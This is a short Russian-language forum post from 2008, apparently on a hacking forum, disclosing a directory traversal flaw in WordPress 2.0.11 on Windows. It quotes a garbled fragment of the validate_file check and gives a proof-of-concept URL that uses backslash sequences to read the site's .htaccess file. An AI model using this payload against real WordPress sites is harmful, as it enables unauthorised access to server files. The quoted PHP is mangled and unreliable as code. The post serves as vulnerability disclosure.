Тема: [ Обзор уязвимостей WordPress ]
Показать сообщение отдельно

directory traversal vulnerabilities in WP 2.0.11(win only)
  #20  
Старый 03.01.2008, 16:43
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию directory traversal vulnerabilities in WP 2.0.11(win only)
PHP код:
function validate_file(..)
if (false !== strpos($file./)) 
Код:
Proof of concept:
http://site/wp-admin/index.php?page=\..\..\.htaccess
__________________
 
Ответить с цитированием